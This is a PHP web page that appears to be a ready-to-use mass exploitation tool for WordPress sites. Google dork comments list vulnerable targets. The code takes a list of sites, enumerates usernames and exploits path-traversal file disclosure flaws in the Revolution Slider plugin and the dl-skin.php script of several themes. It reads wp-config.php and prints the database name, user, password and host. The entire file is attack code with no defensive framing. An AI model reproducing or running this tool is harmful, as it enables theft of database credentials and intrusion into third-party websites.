Exploits Wordpress LFD

<html>
<body>
<pre><center>


        <h2>Exploits Wordpress LFD </h2>

            <p>Coded by jsass , Twitter : @kwSecurity</p>

_______________________________________________________________

    <pre><hre>
	<form method='POST'>
    <textarea name='sites' cols='45' rows='15'></textarea>
	<input type='submit' value='Exploit' /><br>
    </form>


<?php

# Coded by : jsass
# Exploits Wordpress LFD
# Twitter : @KwSecurity
# Great's To Sec4ever.com &

/**
 Dork Google: revslider.php "index of"
 "wp-content/themes/construct/"
 "wp-content/themes/persuasion"
 "wp-content/themes/manbiz2"
 "wp-content/themes/elegance"
 "wp-content/themes/modular/"
 "wp-content/themes/myriad/"
 "wp-content/themes/echelon/"
 "wp-content/themes/fusion/"
 "wp-content/themes/awake/"
**/


@set_time_limit(0);
ob_implicit_flush(true);
ob_end_flush();

$sites = explode("\r\n", $_POST['sites']);

foreach($sites as $site) {

$site = trim($site);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$site");
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
$get = curl_exec($ch);
curl_close($ch);
	if(preg_match("#WordPress (.*?)/>#", $get, $version)){
	$str = str_replace('/>', "", $version[0]);
	$str = str_replace('"', "", $str);

	$users = @file_get_contents("$site/?author=1");
	preg_match('/<title>(.*?)<\/title>/si',$users,$user);
	$wpuser = explode('|',$user[1]);
echo " <br>-----------------------------------</br>";
echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version : ".$str."<br>"; }

	# Dork Google: revslider.php "index of"

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$site/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$xp = curl_exec ($ch);
curl_close($ch);

if(preg_match("#DB_USER#i",$xp)){
preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
echo "DB_NAME:{$DB_NAME[1]}<br>";
preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
echo "DB_USER:{$DB_USER[1]}<br>";
preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
echo "DB_HOST:{$DB_HOST[1]}<br>";

}

$lt = array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php");
	foreach($lt as $l){
	$site = "$site/$l";
$process = curl_init($site);
curl_setopt($process, CURLOPT_TIMEOUT, 30);
curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)");
curl_setopt($process, CURLOPT_HEADER, TRUE);
curl_setopt($process, CURLOPT_POST, 1);
curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php");
curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
$return = curl_exec($process);
if(preg_match("#DB_USER#i",$return)){
preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
echo "DB_NAME:{$DB_NAME[1]}<br>";
preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
echo "DB_USER:{$DB_USER[1]}<br>";
preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
echo "DB_HOST:{$DB_HOST[1]}<br>";
break;
echo " <br>-----------------------------------</br>";

}
}
}

?>
</html>
</body>
</pre></center>